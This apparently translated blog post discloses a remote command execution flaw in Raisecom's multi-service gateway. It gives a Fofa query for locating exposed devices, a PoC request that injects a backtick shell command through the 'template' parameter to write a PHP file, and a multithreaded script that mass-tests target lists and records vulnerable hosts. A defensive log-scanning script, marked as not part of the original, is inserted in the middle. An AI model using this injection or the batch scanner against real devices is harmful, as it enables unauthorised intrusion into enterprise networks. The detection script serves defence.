Raisecom Technology Development Co., Ltd. - RCE Vulnerability in the Multi-Service Intelligent Gateway

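I. Vulnerability Overview

The converged multi-service intelligent gateway is a new-generation, voice-converged access network product that Raisecom offers to small and medium-sized enterprises and industry branch offices. It integrates data, voice, security, and wireless functions to give users a comprehensive, complete network access solution. The vulnerability is in the /vpn/list_base_config.php endpoint, which does not restrict or validate user-supplied parameters. An attacker can use a parameter of this endpoint to write a PHP file and then request it, which results in remote command execution.

(Disclaimer: this blog has nothing to do with anyone who uses this vulnerability for illegal attacks; users bear the corresponding responsibility themselves!!!!)

II. Asset Mapping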

Fofa:
body="/images/raisecom/back.gif" && title=="Web user login"

III. PoC Information

1. Write the PHP file:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

Request /tmp/test.php to verify the vulnerability.
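
A log-side check for the request shown above, as an added example that is not part of the original post: it flags requests to /vpn/list_base_config.php whose decoded template parameter contains shell metacharacters, and any later /tmp/*.php request from the same client. The combined access-log format, the metacharacter set, the function names, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/vpn/list_base_config.php"  # endpoint named in the write-up
PARAM = "template"                        # parameter that carries the payload
# Characters a template name should never contain (assumed policy).
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")
# Client, request target and status of a combined-format log line (assumed format).
REQ_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
DROPPED = re.compile(r"/tmp/[^/]+\.php")  # /www/tmp is served as /tmp per the write-up

def injected_template(target):
    """Return the decoded template value if it holds shell metacharacters."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    for value in parse_qs(parts.query).get(PARAM, []):
        if SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Return injection attempts and follow-up /tmp/*.php hits by the same client."""
    findings, flagged = [], set()
    for line in lines:
        m = REQ_LINE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        value = injected_template(target)
        path = urlsplit(target).path
        if value is not None:
            flagged.add(ip)
            findings.append(("injection", ip, status, value))
        elif ip in flagged and DROPPED.fullmatch(path):
            findings.append(("dropped-file-access", ip, status, path))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=default HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2025:10:00:05 +0000] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27x%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2025:10:00:06 +0000] "GET /tmp/test.php HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for kind, ip, status, detail in scan(SAMPLE_LOG):
        print(f"{kind} client={ip} status={status} detail={detail!r}")
```

A 200 on the follow-up /tmp/*.php request is the signal to treat the device as compromised rather than merely probed.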

IV. Batch Vulnerability Verification Script

import requests
import urllib3
from requests import RequestException
from bs4 import BeautifulSoup
import threading


urllib3.disable_warnings()
result_list = []

def poc(url):
    Path = url.strip()+"/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php phpinfo();unlink(__FILE__);?>'>/www/tmp/test.php`"
    Header = {
        "referer": "https://segmentfault.com/",
        "Sec-ch-ua": '"Not)A;Brand";v="99", " MicrosoftEdge";v="127", " Chromium";v="127"',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0"
    }
    try:
        response = requests.get(url=Path,headers=Header,verify=False,timeout=3)
        if response.status_code == 200:
            try:
                file_check = requests.get(url=(url.strip()+"/tmp/test.php"),headers=Header,verify=False,timeout=3)

                soup = BeautifulSoup(file_check.content,'html.parser')
                php_Extension = soup.find(string="PHP Extension")
                registered_Streams = soup.find(string="Registered PHP Streams")
                registered_Trans = soup.find(string = "Registered Stream Socket Transports")
                if file_check.status_code == 200 and(php_Extension or registered_Trans or registered_Streams):
                    print(f"{url}存在文件写入导致RCE")
                    result_list.append(url.strip()+"\n")

            except RequestException  as k:
                pass


    except RequestException as e:
        pass


def Mult_threading():
    threads = []
    with open("url.txt",'r') as urls:
        for url in urls:
            Thread = threading.Thread(target=poc,args=(url,))
            threads.append(Thread)
            Thread.start()
        for i in threads:
            i.join()

if __name__ == '__main__':
    Mult_threading()
    with open("result.txt",'w') as file:
        for i in result_list:
            file.write(i.strip()+"\n")



